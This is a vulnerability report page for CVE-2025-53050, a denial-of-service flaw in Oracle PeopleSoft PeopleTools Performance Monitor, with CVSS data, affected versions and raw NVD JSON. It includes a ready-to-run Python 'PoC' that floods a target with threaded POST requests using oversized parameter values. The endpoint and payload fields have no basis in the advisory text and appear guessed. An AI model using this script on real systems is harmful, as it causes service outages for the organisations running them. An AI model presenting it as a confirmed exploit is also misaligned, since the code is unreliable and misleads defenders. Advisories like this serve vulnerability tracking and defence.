Security Vulnerability Report
CVE-2025-53050 CVSS 7.5 HIGH


Published: 2025-10-21 20:20:43
Last Modified: 2025-10-23 16:06:57

Description

Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Performance Monitor). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of PeopleSoft Enterprise PeopleTools. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise PeopleTools 8.60
Oracle PeopleSoft Enterprise PeopleTools 8.61
Oracle PeopleSoft Enterprise PeopleTools 8.62

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53050 Oracle PeopleSoft PeopleTools Performance Monitor DoS PoC
# This PoC demonstrates a Denial of Service attack against the Performance Monitor component
# Affected versions: PeopleTools 8.60, 8.61, 8.62
import requests
import threading
import time

TARGET_URL = "https://target-host:port/psp/ps/"
# Performance Monitor servlet endpoint
PM_ENDPOINT = "/psp/ps/?cmd=start&srtDef=psmon"


def send_dos_request(target_url):
    """Send malicious HTTP request to trigger DoS in Performance Monitor"""
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; DoS-PoC)",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "*/*"
    }
    # Craft malicious payload targeting Performance Monitor
    payload = {
        "ICType": "13",  # Performance Monitor type
        "ICXNum": "999999999",  # Large value to cause resource exhaustion
        "MAXVAL": "2147483647",  # Integer overflow trigger
    }
    try:
        response = requests.post(
            target_url + PM_ENDPOINT,
            headers=headers,
            data=payload,
            timeout=10,
            verify=False
        )
        print(f"[+] Request sent - Status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed (possible DoS triggered): {e}")


def exploit(target_url, thread_count=50):
    """Launch concurrent DoS attack against PeopleSoft Performance Monitor"""
    print(f"[*] Starting CVE-2025-53050 DoS attack against: {target_url}")
    threads = []
    for i in range(thread_count):
        t = threading.Thread(target=send_dos_request, args=(target_url,))
        threads.append(t)
        t.start()
        time.sleep(0.1)
    for t in threads:
        t.join()
    print("[*] Attack completed")


if __name__ == "__main__":
    exploit(TARGET_URL)

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53050", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:42.970", "lastModified": "2025-10-23T16:06:57.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Performance Monitor). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of PeopleSoft Enterprise PeopleTools. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.60", "versionEndIncluding": "8.62", "matchCriteriaId": "9FDC7CAF-BD83-4D24-B199-0438570DDB47"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}